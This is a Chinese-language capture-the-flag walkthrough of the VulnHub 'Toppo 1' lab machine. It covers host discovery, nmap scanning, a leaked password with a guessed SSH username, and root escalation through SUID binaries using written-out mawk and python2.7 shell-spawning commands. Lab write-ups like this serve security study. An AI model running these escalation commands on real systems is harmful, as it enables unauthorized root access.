本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现
地址:https://www.vulnhub.com/entry/toppo-1,245/
直接nmap扫描
目标开了个80端口,访问看看
发现一个admin目录,访问看看
根据提示是知道目标靶机的密码,但是不知道用户名,这个时候尝试试试看的态度,看用户名是否是ted,通过这个用户名使用ssh去登录目标靶机
居然登录成功
拿到此权限看看是否存在SUID的权限
find / -perm -u=s -type f 2>/dev/null
发现含有类似awk的编译环境,具体可看下面链接了解
https://www.cnblogs.com/GodMode/p/4949370.html
直接使用此命令进行提权
mawk 'BEGIN {system("/bin/sh")}'
这里因为python也存在SUID的权限,那么也是可以提权的
python2.7 -c 'import pty;pty.spawn("/bin/sh")'